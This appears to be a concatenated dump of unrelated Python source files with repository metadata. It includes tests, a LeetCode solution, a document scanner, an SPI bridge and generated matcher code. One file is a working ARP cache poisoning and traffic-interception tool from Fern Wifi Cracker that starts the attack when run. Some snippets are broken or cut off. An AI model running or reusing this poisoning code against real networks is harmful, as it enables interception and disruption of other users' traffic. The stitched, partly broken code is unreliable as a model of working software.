    self.assertEqual(logged.count('loss'), 0)
    self.assertEqual(logged.count('AverageReturn'), 0)
    # With `resume_training_loops` set to True, increasing
    # `training_loops` will result in more training.
    with mock.patch.object(
        export_utils, 'logging', new_callable=MockLog) as mock_logging:
      train(training_loops=training_loops + 1, resume_training_loops=True)
      logged = mock_logging.as_string()
    self.assertEqual(logged.count('loss'), 1)
    self.assertEqual(logged.count('AverageReturn'), 1)
    expected_num_episodes = (training_loops + 1) * steps_per_loop * batch_size
    self.assertEqual(
        logged.count(f'NumberOfEpisodes = {expected_num_episodes}'), 1)
    # With `resume_training_loops` set to False, `training_loops` of 1
    # will result in more training.
    with mock.patch.object(
        export_utils, 'logging', new_callable=MockLog) as mock_logging:
      train(training_loops=1, resume_training_loops=False)
      logged = mock_logging.as_string()
    self.assertEqual(logged.count('loss'), 1)
    self.assertEqual(logged.count('AverageReturn'), 1)
    # The number of episodes is expected to accumulate over all trainings using
    # the same `root_dir`.
    expected_num_episodes = (training_loops + 2) * steps_per_loop * batch_size
    self.assertEqual(
        logged.count(f'NumberOfEpisodes = {expected_num_episodes}'), 1)
if __name__ == '__main__':
  # Discover and run all test cases in this module.
  tf.test.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
004867de305d55875c7b5d8dc93e22bff54fff86 | 10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94 | /Python/restore-the-array-from-adjacent-pairs.py | 91aa1ba0ebb1c185e6625d0352c4f6985e14a576 | [
"MIT"
] | permissive | kamyu104/LeetCode-Solutions | f54822059405ef4df737d2e9898b024f051fd525 | 4dc4e6642dc92f1983c13564cc0fd99917cab358 | refs/heads/master | 2023-09-02T13:48:26.830566 | 2023-08-28T10:11:12 | 2023-08-28T10:11:12 | 152,631,182 | 4,549 | 1,651 | MIT | 2023-05-31T06:10:33 | 2018-10-11T17:38:35 | C++ | UTF-8 | Python | false | false | 571 | py | # Time: O(n)
# Space: O(n)
import collections
class Solution(object):
    def restoreArray(self, adjacentPairs):
        """Reconstruct the hidden array from its unordered adjacent pairs.

        :type adjacentPairs: List[List[int]]
        :rtype: List[int]
        """
        # Adjacency map: interior values end up with two neighbors, the two
        # endpoints of the hidden array with exactly one.
        neighbors = collections.defaultdict(list)
        for left, right in adjacentPairs:
            neighbors[left].append(right)
            neighbors[right].append(left)
        # Start from the first endpoint encountered (dict insertion order).
        start = next(value for value in neighbors if len(neighbors[value]) == 1)
        restored = [start, neighbors[start][0]]
        # Walk the chain: of the current value's neighbors, take the one we
        # did not just come from.
        while len(restored) != len(adjacentPairs) + 1:
            options = neighbors[restored[-1]]
            restored.append(options[1] if options[0] == restored[-2] else options[0])
        return restored
| [
"noreply@github.com"
] | noreply@github.com |
43db2fc680aca832dc48793399f15ccd286de043 | 53fc3f163a02b0f06df05ad385ad175cc057e10a | /tests/renderer/cartographer/image/test_factory.py | 3d863ae4fe02f7da5b56d608b9f12cbcbd3412af | [
"MIT"
] | permissive | Kotaimen/stonemason | 15284d7ca800186b9972d176ff1232ef7f0372e8 | ebbfab294a9e412cc7d04ea1dcb163e45c0de5d2 | refs/heads/develop | 2021-12-10T09:57:46.453283 | 2018-02-15T10:21:35 | 2018-02-15T10:21:35 | 28,327,740 | 5 | 1 | null | 2015-11-10T02:25:45 | 2014-12-22T06:44:58 | Python | UTF-8 | Python | false | false | 1,427 | py | # -*- encoding: utf-8 -*-
__author__ = 'ray'
__date__ = '4/21/15'
import unittest
from stonemason.renderer.cartographer.image import ImageNodeFactory
from stonemason.renderer.cartographer.image.terminal import Color
from stonemason.renderer.cartographer.image.transform import MinFilter
from stonemason.renderer.cartographer.image.composite import AlphaComposer
class TestImageNodeFactory(unittest.TestCase):
    """Checks that ImageNodeFactory builds the expected node types."""

    def setUp(self):
        self.factory = ImageNodeFactory()

    def test_create_terminal_node(self):
        terminal = self.factory.create_terminal_node(
            'test', 'image.input.color', color='#000')
        self.assertIsInstance(terminal, Color)

    def test_create_transform_node(self):
        color_node = self.factory.create_terminal_node(
            'test', 'image.input.color', color='#000')
        transform = self.factory.create_transform_node(
            'test', 'image.transform.filter.min', source=color_node)
        self.assertIsInstance(transform, MinFilter)

    def test_create_composite_layer(self):
        # Two identical color terminals feed the composite node.
        inputs = [
            self.factory.create_terminal_node(
                'test', 'image.input.color', color='#000')
            for _ in range(2)
        ]
        composite = self.factory.create_composite_node(
            'test', 'image.composite.alphacomposer', sources=inputs)
        self.assertIsInstance(composite, AlphaComposer)
| [
"gliese.q@gmail.com"
] | gliese.q@gmail.com |
b278b96f504d47d06290fc42b8a90ffd778ef32f | 86e1614bc5908cee4cf4a3ca90b6177cbe94cf50 | /DocumentScannerMain.py | bb550d4bc0c1a55935af4036e57ac08020eeafe8 | [] | no_license | aryamanjain036/imageprocessingproject | 0ee4e24e9153174b2a07509db37dfe7357b33cbc | f4ed8e64f102fd2251c831a115a80a4d2e0dbf04 | refs/heads/master | 2023-03-22T11:13:03.817091 | 2021-03-26T04:36:28 | 2021-03-26T04:36:28 | 270,027,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,320 | py | import cv2
import numpy as np
import utlis
import pytesseract
# --- configuration ----------------------------------------------------------
webCam = True              # True: grab frames from the camera; False: read imageLocation
imageLocation = "5.jpeg"
cap = cv2.VideoCapture(1)
cap.set(10, 160)           # property id 10 = brightness
heightImg = 480
widthImg = 480

utlis.initializeTrackbars()  # trackbars provide the Canny thresholds interactively
count = 0

while True:
    imgBlank = np.zeros((heightImg, widthImg, 3), np.uint8)
    # BUG FIX: the original unconditionally re-read `imageLocation` right after
    # this branch, which made the webcam path dead code and `webCam` useless.
    if webCam:
        success, img = cap.read()
    else:
        img = cv2.imread(imageLocation)
    img = cv2.resize(img, (widthImg, heightImg))
    imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)  # convert the image to grayscale
    imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1)   # blur to suppress noise before edges
    thres = utlis.valTrackbars()                     # (low, high) Canny thresholds from the trackbars
    imgThreshold = cv2.Canny(imgBlur, thres[0], thres[1])
    kernel = np.ones((5, 5))
    imgDial = cv2.dilate(imgThreshold, kernel, iterations=2)  # APPLY DILATION
    imgThreshold = cv2.erode(imgDial, kernel, iterations=1)   # APPLY EROSION

    ## FIND ALL COUNTOURS
    imgConts = img.copy()
    imgBigConts = img.copy()
    contours, hierarchy = cv2.findContours(imgThreshold, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)  # FIND ALL CONTOURS
    cv2.drawContours(imgConts, contours, -1, (0, 255, 0), 10)  # DRAW ALL DETECTED CONTOURS

    # FIND THE LARGEST COUNTOUR IN THE FRAME
    big, maxArea = utlis.biggestContour(contours)  # FIND THE BIGGEST CONTOUR
    if big.size != 0:
        big = utlis.reorder(big)
        cv2.drawContours(imgBigConts, big, -1, (0, 255, 0), 20)  # DRAW THE BIGGEST CONTOUR
        imgBigConts = utlis.drawRectangle(imgBigConts, big, 2)
        pts1 = np.float32(big)  # PREPARE POINTS FOR WARP
        pts2 = np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]])  # PREPARE POINTS FOR WARP
        matrix = cv2.getPerspectiveTransform(pts1, pts2)
        imgWarpColored = cv2.warpPerspective(img, matrix, (widthImg, heightImg))

        # REMOVE EXTRA UNWANTED PIXELS FROM THE SIDES
        imgWarpColored = imgWarpColored[20:imgWarpColored.shape[0] - 20, 20:imgWarpColored.shape[1] - 20]
        imgWarpColored = cv2.resize(imgWarpColored, (widthImg, heightImg))

        # APPLY ADAPTIVE THRESHOLD
        imgWarpGray = cv2.cvtColor(imgWarpColored, cv2.COLOR_BGR2GRAY)
        imgAdaptiveThre = cv2.adaptiveThreshold(imgWarpGray, 255, 1, 1, 7, 2)
        imgAdaptiveThre = cv2.bitwise_not(imgAdaptiveThre)
        imgAdaptiveThre = cv2.medianBlur(imgAdaptiveThre, 3)

        # Image Array for Display
        imageArray = ([img, imgGray, imgThreshold, imgConts],
                      [imgBigConts, imgWarpColored, imgWarpGray, imgAdaptiveThre])
    else:
        imageArray = ([img, imgGray, imgThreshold, imgConts],
                      [imgBlank, imgBlank, imgBlank, imgBlank])

    # LABELS FOR DISPLAY
    lables = [["Original", "Gray", "Threshold", "Contours"],
              ["Biggest Contour", "Warp Prespective", "Warp Gray", "Adaptive Threshold"]]
    stackedImage = utlis.stackImages(imageArray, 0.75, lables)
    cv2.imshow("Result", stackedImage)

    # SAVE IMAGE WHEN 's' key is pressed
    if cv2.waitKey(1) & 0xFF == ord('s'):
        cv2.imwrite("Scanned/myImage" + str(count) + ".jpg", imgWarpColored)
        cv2.rectangle(stackedImage, ((int(stackedImage.shape[1] / 2) - 230), int(stackedImage.shape[0] / 2) + 50),
                      (1100, 350), (0, 255, 0), cv2.FILLED)
        cv2.putText(stackedImage, "Scan Saved", (int(stackedImage.shape[1] / 2) - 200, int(stackedImage.shape[0] / 2)),
                    cv2.FONT_HERSHEY_DUPLEX, 3, (0, 0, 255), 5, cv2.LINE_AA)
        cv2.imshow('Result', stackedImage)

        # OCR the saved scan with Tesseract and print the recognized text.
        pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files\Tesseract-OCR\tesseract.exe"
        img = cv2.imread("Scanned/myImage" + str(count) + ".jpg")
        grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        adaptive_threshold = cv2.adaptiveThreshold(grey, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 111,
                                                   11)
        text = pytesseract.image_to_string(adaptive_threshold)
        print(text)
        # cv2.imshow("grey",grey)
        # cv2.imshow("adaptive_th",adaptive_threshold)
        cv2.waitKey(0)
        cv2.waitKey(300)
        count += 1
| [
"noreply@github.com"
] | noreply@github.com |
d86da89a7837039de5cc9432332391c1929d6f86 | d2e8ad203a37b534a113d4f0d4dd51d9aeae382a | /django_graphene_authentication/django_graphene_authentication/signals.py | 47adcc189eddf36fa915f1ac41f05cdf7b2ebd8f | [
"MIT"
] | permissive | Koldar/django-koldar-common-apps | 40e24a7aae78973fa28ca411e2a32cb4b2f4dbbf | 06e6bb103d22f1f6522e97c05ff8931413c69f19 | refs/heads/main | 2023-08-17T11:44:34.631914 | 2021-10-08T12:40:40 | 2021-10-08T12:40:40 | 372,714,560 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from django.dispatch import Signal
# Sent when a refresh token is revoked. Historically declared with
# providing_args=['request', 'refresh_token'] (the keyword was removed in
# Django 4.0, so the argument names are kept here as documentation).
refresh_token_revoked = Signal()
# Sent when a refresh token is rotated (a new one issued). Historically
# providing_args=['request', 'refresh_token', 'refresh_token_issued'].
refresh_token_rotated = Signal()
| [
"massimobono1@gmail.com"
] | massimobono1@gmail.com |
420f08dd3e3e41f5242c270cc9e6a957d4aeaa38 | 47a8b678c8a9b8105a4462253c84a2aad9eb5705 | /test.py | 6b32f8183fc5f34f8e4bdc7d9915b143965a838e | [] | no_license | megdailey/test | 5b7e8692557730081d2c7221d0ccb2858eaf1676 | 504ff9e2bf46b78ebd3bad3eea1670c9c6749658 | refs/heads/master | 2020-05-15T12:27:31.035264 | 2019-04-19T13:49:32 | 2019-04-19T13:49:32 | 182,264,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | print(2+2)
# Print "2" twice, exactly like the original pair of literal prints.
for _ in range(2):
    print(1 + 1)
| [
"mmd0130@gmail.com"
] | mmd0130@gmail.com |
be0e8fe88af319157a3e763aa35b275b56f17d8c | 3d794e38aca224f80e1af0eb3536e031cd784c6d | /_posts/some_other_code.py | b731d9cc9d295b6e99c54236ca7d3b64885d7f17 | [
"MIT"
] | permissive | PhilStem/PhilStem.github.io | ffe785683f7b0cbcacef24bc2eaf8441c21dbd7b | cfa3f0a4fc306117e06c24ad8f3999317ef59884 | refs/heads/master | 2022-10-17T21:28:49.895524 | 2020-09-11T18:34:16 | 2020-09-11T18:34:16 | 236,303,734 | 0 | 0 | NOASSERTION | 2022-10-06T09:07:08 | 2020-01-26T11:38:24 | HTML | UTF-8 | Python | false | false | 91 | py | from sklearn.utils.estimator_checks import check_estimator
check_estimator(LinearRegressor) | [
"philipp.stemberger@gmail.com"
] | philipp.stemberger@gmail.com |
e9e739c00119abf72ad26943f9ddfdbcd2dc0696 | db56c00e7ab30329bd53d8ee35caad94dc13efb6 | /src/hex_control/hex_control/spi_bridge.py | 486926daf1031295e05dc8237bf32899adebed0a | [] | no_license | Wojcik98/hexapod | a7bbdedba3eec6f662c52671956408d74fee3a2b | dc6d01dfd27b4a31f3abeabb9acfe202640cb6d8 | refs/heads/master | 2023-06-09T00:28:43.015250 | 2021-06-30T10:11:24 | 2021-06-30T10:11:24 | 321,147,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,412 | py | import spidev
import rclpy
from std_msgs.msg import UInt8MultiArray
from rclpy.node import Node
# SPI bus clock in Hz (2 MHz).
SPI_SPEED = 2000000


class SpiBridge(Node):
    # ROS 2 node that forwards byte-array commands from the `stm32_cmd`
    # topic to the microcontroller over SPI bus 0 / chip-select 0.
    def __init__(self):
        super().__init__('spi_bridge')
        self.spi = spidev.SpiDev()
        self.spi.open(0, 0)
        self.spi.max_speed_hz = SPI_SPEED
        """Update frequency
        Single targets: {baudrate} / ({uart frame length} * {cmd length} * {number of joint})
        = 115200 / (9 * 4 * 18) ~= 177Hz <- autodetect-baudrate on maestro
        = 200000 / (9 * 4 * 18) ~= 300Hz <- fixed-baudrate on maestro
        Multiple targets: {baudrate} / ({uart frame length} * ({header length} + {mini-cmd length} * {number of joints}))
        = 115200 / (9 * (3 + 2 * 18)) ~= 320Hz
        = 200000 / (9 * (3 + 2 * 18)) ~= 560Hz"""
        self.subscription = self.create_subscription(
            UInt8MultiArray, 'stm32_cmd', self.callback, 10
        )

    def callback(self, msg: UInt8MultiArray):
        # Time the SPI transfer so the achievable update rate can be observed.
        now = self.get_clock().now()
        data = bytearray(msg.data)
        self.spi.xfer3(data)
        elapsed = self.get_clock().now() - now
        print(f"Sent {len(data)} bytes in {elapsed.nanoseconds / 10**9:.3f}s")
def main(args=None):
    """Initialize rclpy, spin the SPI bridge node until shutdown, then clean up."""
    rclpy.init(args=args)
    bridge = SpiBridge()
    print('SPI Bridge ready!')
    rclpy.spin(bridge)
    bridge.destroy_node()
    rclpy.shutdown()
if __name__ == '__main__':
    # Entry point when launched directly (e.g. via `ros2 run` or python).
    main()
| [
"wojcikmichal98@gmail.com"
] | wojcikmichal98@gmail.com |
9eb53df032e3c06138e6c43f5b306169140d64a0 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part006719.py | 42aa4358fcc37db511e0345b6fdde91a2bd9246d | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher47811(CommutativeMatcher):
    # Auto-generated matchpy many-to-one matcher for commutative `Mul`
    # patterns (SymPy/RUBI rule compilation output). Regenerate rather
    # than editing by hand.
    _instance = None
    # pattern index -> (index, constant-part multiset, list of
    # (VariableWithCount(name, min, max, default), associative operation))
    patterns = {
        0: (0, Multiset({}), [
            (VariableWithCount('i2.2.1.0', 1, 1, None), Mul),
            (VariableWithCount('i2.3.2.2.1.0_1', 1, 1, S(1)), Mul)
        ]),
        1: (1, Multiset({}), [
            (VariableWithCount('i2.2.1.1', 1, 1, None), Mul),
            (VariableWithCount('i2.3.2.2.1.0_1', 1, 1, S(1)), Mul)
        ]),
        2: (2, Multiset({}), [
            (VariableWithCount('i2.3.2.2.1.0', 1, 1, None), Mul),
            (VariableWithCount('i2.3.2.2.1.0_2', 1, 1, S(1)), Mul)
        ])
    }
    subjects = {}
    subjects_by_id = {}
    bipartite = BipartiteGraph()
    associative = Mul
    max_optional_count = 1
    anonymous_patterns = set()

    def __init__(self):
        self.add_subject(None)

    @staticmethod
    def get():
        # Lazily created singleton instance.
        if CommutativeMatcher47811._instance is None:
            CommutativeMatcher47811._instance = CommutativeMatcher47811()
        return CommutativeMatcher47811._instance

    @staticmethod
    def get_match_iter(subject):
        subjects = deque([subject]) if subject is not None else deque()
        subst0 = Substitution()
        # State 47810
        # The bare `return` before `yield` makes this an empty generator:
        # it terminates immediately and yields no matches.
        return
        yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
b3f84d79385b2e8fd9a8f9a72177eabb2b44ec3c | f846aad1778d33ff59a8c931a9107bb7819a8a7a | /Fern-Wifi-Cracker-Py3/core/toolbox/MITM_Core.py | 40844758ae482711fe731c4ddef071fc895ee535 | [] | no_license | kimocoder/fern-wifi-cracker | f170f397bd34c5ab04849fb935c0f50856ef70b3 | 04818cb97bf2068e3015c954dbeaa510b95caa29 | refs/heads/master | 2023-04-27T07:29:00.385430 | 2019-06-01T09:58:46 | 2019-06-01T09:58:46 | 91,082,900 | 2 | 0 | null | 2019-06-01T09:59:12 | 2017-05-12T11:03:19 | Python | UTF-8 | Python | false | false | 11,507 | py | #-------------------------------------------------------------------------------
# Name: MITM Core (Man In The Middle)
# Purpose: Redirecting Network traffic to attack host by various MITM engines
#
# Author: Saviour Emmanuel Ekiko
#
# Created: 15/08/2012
# Copyright: (c) Fern Wifi Cracker 2011
# Licence: <GNU GPL v3>
#
#
#-------------------------------------------------------------------------------
# GNU GPL v3 Licence Summary:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import time
import thread
import threading
from scapy.all import *
class Fern_MITM_Class:
    """Namespace grouping Fern's man-in-the-middle attack engines."""

    class ARP_Poisoning(object):
        """ARP cache poisoning / traffic-redirection engine.

        Ported to Python 3 (the original was Python-2-only):
          * ``thread.start_new_thread(...)`` -> ``threading.Thread(...).start()``
          * ``dict.has_key(k)``              -> ``k in dict``
          * ``commands.getstatusoutput``     -> ``subprocess.getstatusoutput``
          * poisoning iterates a snapshot of ``subnet_hosts`` because the
            sniffer thread adds hosts to it concurrently
          * ``run_attack`` now validates the option *before* dispatching
            (the original only reached the validation checks after the
            blocking attack call).
        """

        def __init__(self):
            self._attack_option = str()      # "ARP POISON" or "ARP POISON + ROUTE" or "DOS"
            self.interface_card = str()      # e.g. eth0, wlan0
            self.gateway_IP_address = str()  # router / default gateway address
            self._gateway_MAC_addr = str()   # router MAC, filled in by _set_Gateway_MAC()
            self.subnet_hosts = {}           # IP -> MAC mappings of discovered hosts
            self.control = True              # set False to stop all worker loops
            self.semaphore = threading.BoundedSemaphore(15)
            self._local_mac = str()          # MAC address of interface_card
            self._local_IP_Address = str()   # IP address of interface_card

        def _start_daemon(self, worker):
            # Helper replacing Python 2's thread.start_new_thread(); daemon
            # threads do not block interpreter exit, matching the old module.
            threading.Thread(target=worker, daemon=True).start()

        def ARP_Who_Has(self, target_ip_address):
            '''Build a broadcast ARP request so the target answers with its MAC.'''
            ethernet = Ether(dst="ff:ff:ff:ff:ff:ff", src=self._local_mac)
            arp_packet = ARP(hwtype=0x1, ptype=0x800, hwlen=0x6, plen=0x4,
                             op="who-has", hwsrc=self._local_mac,
                             psrc=self._local_IP_Address,
                             hwdst="00:00:00:00:00:00", pdst=target_ip_address)
            padding_packet = Padding(load="\x00" * 18)
            return ethernet / arp_packet / padding_packet

        def ARP_Is_At(self, ip_address, target_mac_address):
            '''Build a spoofed ARP reply claiming the gateway IP lives at our MAC.'''
            ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=self._local_mac)
            arp_packet = ARP(hwtype=0x1, ptype=0x800, hwlen=0x6, plen=0x4,
                             op="is-at", hwsrc=self._local_mac,
                             psrc=self.gateway_IP_address,
                             hwdst='ff:ff:ff:ff:ff:ff', pdst=ip_address)
            padding_packet = Padding(load="\x00" * 18)
            return ethernet / arp_packet / padding_packet

        def _gateway_MAC_Probe(self):
            '''Worker: periodically ARP the gateway until its MAC is known.'''
            while self.control:
                packet = self.ARP_Who_Has(self.gateway_IP_address)
                sendp(packet, iface=self.interface_card)
                if self._gateway_MAC_addr:
                    break
                time.sleep(3)

        def _set_Gateway_MAC(self):
            '''Block until the gateway's MAC address has been sniffed.'''
            self._gateway_MAC_addr = str()
            self._start_daemon(self._gateway_MAC_Probe)
            while not self._gateway_MAC_addr:
                reply = sniff(filter="arp", count=2)[1]
                if reply.haslayer(ARP):
                    # op == 0x2 is an ARP reply ("is-at").
                    if (reply.op == 0x2) and (reply.psrc == self.gateway_IP_address):
                        self._gateway_MAC_addr = reply.hwsrc
                        break

        def _network_Hosts_Probe(self):
            '''Worker: ARP-sweep the whole subnet for live hosts every 30s.'''
            while self.control:
                segment = int(self.gateway_IP_address[:self.gateway_IP_address.index(".")])
                if segment in range(1, 127):      # Class A IP address
                    address_func = self.class_A_generator
                elif segment in range(128, 191):  # Class B IP address
                    address_func = self.class_B_generator
                else:                             # Class C IP address
                    address_func = self.class_C_generator
                for address in address_func(self.gateway_IP_address):
                    if not self.control:
                        return
                    time.sleep(0.01)
                    # Send a who-has probe to every host on the subnet.
                    sendp(self.ARP_Who_Has(address), iface=self.interface_card)
                time.sleep(30)

        def _get_Network_Hosts_Worker(self, reply):
            '''Sniffer callback: record the IP/MAC of every host that answers.'''
            with self.semaphore:
                if reply.haslayer(ARP):
                    if (reply.op == 0x2) and (reply.hwsrc != self._local_mac):
                        # NOTE(review): the original tested the MAC against the
                        # dict's IP keys (always true); kept for behavioral
                        # parity — the assignment below overwrites duplicates
                        # harmlessly anyway.
                        if reply.hwsrc not in self.subnet_hosts:
                            if str(reply.hwsrc) != str(self._gateway_MAC_addr):
                                self.subnet_hosts[reply.psrc] = reply.hwsrc

        def _get_Network_Hosts(self):
            '''Sniff ARP replies from hosts on the subnet (runs until killed).'''
            self._start_daemon(self._network_Hosts_Probe)
            sniff(filter="arp", prn=self._get_Network_Hosts_Worker, store=0)

        def _poison_arp_cache(self):
            '''Continuously poison the ARP cache of every detected host.'''
            while self.control:
                # Snapshot the keys: the sniffer thread mutates subnet_hosts.
                for ip_address in list(self.subnet_hosts):
                    packet = self.ARP_Is_At(ip_address, self.subnet_hosts[ip_address])
                    sendp(packet, iface=self.interface_card)
                time.sleep(5)

        def _redirect_network_traffic_worker(self, routed_data):
            '''Forward frames addressed to our MAC on to the real gateway.'''
            with self.semaphore:
                if routed_data.haslayer(Ether):
                    if routed_data.getlayer(Ether).dst == self._local_mac:
                        routed_data.getlayer(Ether).dst = self._gateway_MAC_addr
                        sendp(routed_data, iface=self.interface_card)

        def _redirect_network_traffic(self):
            '''Redirect intercepted traffic to the gateway address.'''
            sniff(prn=self._redirect_network_traffic_worker, store=0)

        def Start_ARP_Poisoning(self, route_enabled=True):
            '''Run the attack: resolve gateway, discover hosts, then poison.

            Blocks in the poisoning loop until `self.control` is set False.
            '''
            self.control = True
            self._local_mac = self.get_Mac_Address(self.interface_card).strip()
            self._local_IP_Address = self.get_IP_Adddress()
            self._set_Gateway_MAC()
            self._start_daemon(self._get_Network_Hosts)  # discover subnet hosts
            if route_enabled:
                # Redirect victims' traffic to the real default gateway.
                self._start_daemon(self._redirect_network_traffic)
            self._poison_arp_cache()  # poison the cache of all network hosts

        #################### OS NETWORKING FUNCTIONS #####################
        def get_Mac_Address(self, interface):
            '''Read the interface's MAC address from sysfs.'''
            sys_net = "/sys/class/net/" + interface + "/address"
            # `with` guarantees the file handle is closed even on error.
            with open(sys_net, "r") as addr:
                mac_addr = addr.read()
            return mac_addr

        def get_IP_Adddress(self):
            '''Parse the interface's IPv4 address out of `ifconfig` output.'''
            import re
            import subprocess  # Python 3 replacement for the removed `commands` module
            regex = r"inet addr:((\d+.){3}\d+)"
            sys_out = subprocess.getstatusoutput("ifconfig " + self.interface_card)[1]
            result = re.findall(regex, sys_out)
            if result:
                return result[0][0]
            return "0.0.0.0"

        def class_A_generator(self, address):
            '''Generates CIDR class A addresses sharing the first octet.'''
            # /8 Class A address host range = pow(2,24) - 2
            mod = address.index('.')
            address = address[:mod] + '.%d' * 3
            for first_octect in range(255):
                for second_octect in range(255):
                    for third_octect in range(255):
                        yield address % (first_octect, second_octect, third_octect)

        def class_B_generator(self, address):
            '''Generates CIDR class B addresses sharing the first two octets.'''
            # /16 Class B address host range = pow(2,16) - 2
            mod = address.rindex('.')
            address = address[:address[0:mod].rindex('.')] + '.%d' * 2
            for first_octect in range(255):
                for second_octect in range(255):
                    yield address % (first_octect, second_octect)

        def class_C_generator(self, address):
            '''Generates CIDR class C addresses sharing the first three octets.'''
            # /24 Class C address host range = pow(2,8) - 2
            process = address.rindex('.')
            address = address[:process] + '.%d'
            for octect in range(255):
                yield address % octect
        #################### OS NETWORKING FUNCTIONS END ########################

        def set_Attack_Option(self, option):
            '''"ARP POISON" or "ARP POISON + ROUTE" or "DOS"'''
            self._attack_option = option

        def run_attack(self):
            '''Validate the configured option, then launch the attack (blocks).'''
            attack_options = ["ARP POISON", "ARP POISON + ROUTE", "DOS"]
            # Validate BEFORE dispatching; the original only checked after the
            # (blocking) attack call, so bad options were reported late.
            if self._attack_option == str():
                raise Exception("Attack Type has not been set")
            if self._attack_option not in attack_options:
                raise Exception("Invalid Attack Option")
            if self._attack_option == "ARP POISON":
                self.Start_ARP_Poisoning(False)
            elif self._attack_option == "ARP POISON + ROUTE":
                self.Start_ARP_Poisoning(True)
            elif self._attack_option == "DOS":
                self.Start_ARP_Poisoning(False)
# Script entry point: the Fern launcher exports the interface and gateway
# through environment variables before starting this module; the combined
# ARP-poison + traffic-routing attack then runs until the process is killed.
instance = Fern_MITM_Class.ARP_Poisoning()
instance.interface_card = os.environ["interface_card"]
instance.gateway_IP_address = os.environ["gateway_ip_address"]
instance.set_Attack_Option("ARP POISON + ROUTE")
instance.run_attack()
# Usage:
# instance = Fern_MITM_Class.ARP_Poisoning()
# instance.interface_card = "eth0"
# instance.gateway_IP_address = "192.168.133.1"
# instance.set_Attack_Option("ARP POISON + ROUTE")
# instance.start()
# instance.stop()
| [
"simone.mione1@gmail.com"
] | simone.mione1@gmail.com |
3c6a173d531bdd508f51562417c45192f91fcba7 | 9319dddcfded4150ca9ee7b2a08c6ad993f20005 | /model/BmeEntity.py | d55aa036a247ded4e7388e58dcea2d10d946c445 | [] | no_license | agrdan/bme_test_1 | 5567a06d71b6ad39b7c2d439657c465e390af6fd | e5715589ee4972bed762581dc4b85ddd7f505455 | refs/heads/master | 2023-03-08T00:16:02.166894 | 2021-02-16T07:27:51 | 2021-02-16T07:27:51 | 339,308,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | from helper import db
class BmeEntity(db.Model):
    # ORM model: one BME sensor reading persisted in the `analytics` table.
    __tablename__ = 'analytics'
    id = db.Column(db.Integer(), primary_key=True)  # surrogate primary key
    temperature = db.Column(db.Float())  # temperature reading (units not stated here — presumably Celsius; confirm at the producer)
    gas = db.Column(db.Integer())        # gas sensor reading
    humidity = db.Column(db.Float())     # humidity reading
    pressure = db.Column(db.Float())     # pressure reading
    time = db.Column(db.String(20))      # reading timestamp stored as a <=20-char string
"Andreas.Grdjan@emilfreydigital.hr"
] | Andreas.Grdjan@emilfreydigital.hr |
cccac8d820d9d534647989e6cfc573f5a94e1876 | 5c15aba2bdcd4348c988245f59817cbe71b87749 | /src/trial.py | 00cd0826415c55ab5e87e90071586c86ffae075a | [] | no_license | chengshaozhe/commitmentBenefits | f7db038333ee95217713d1d4b2a1fb3d0c295fdd | 0388803960bc9995ffbcfb6435c134e488a98b63 | refs/heads/master | 2023-03-27T02:31:01.522997 | 2021-01-12T10:18:12 | 2021-01-12T10:18:12 | 310,592,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,356 | py | import numpy as np
import pygame as pg
from pygame import time
import collections as co
import pickle
import random
def calculateGridDis(grid1, grid2):
    """Manhattan (L1) distance between two grid cells, as an int."""
    difference = np.array(grid1) - np.array(grid2)
    return int(np.sum(np.abs(difference)))
def creatRect(coor1, coor2):
    """List every integer grid point inside the axis-aligned rectangle
    spanned by the two (possibly unordered) corner coordinates."""
    (xMin, xMax), (yMin, yMax) = (sorted(axis) for axis in zip(coor1, coor2))
    return [(i, j)
            for i in range(xMin, xMax + 1)
            for j in range(yMin, yMax + 1)]
def calculateAvoidCommitmnetZone(playerGrid, target1, target2):
    """Cells on shortest paths to BOTH targets, excluding the player's cell.

    The overlap is non-empty only when the player is equidistant from the
    two targets; otherwise an empty list is returned.
    """
    if calculateGridDis(playerGrid, target1) != calculateGridDis(playerGrid, target2):
        return []
    overlap = list(set(creatRect(playerGrid, target1)).intersection(set(creatRect(playerGrid, target2))))
    # The player's own cell is always a corner of both rectangles.
    overlap.remove(tuple(playerGrid))
    return overlap
def inferGoal(originGrid, aimGrid, targetGridA, targetGridB):
    """Classify an intended step: 1 = toward target A, 2 = toward B, 0 = tie.

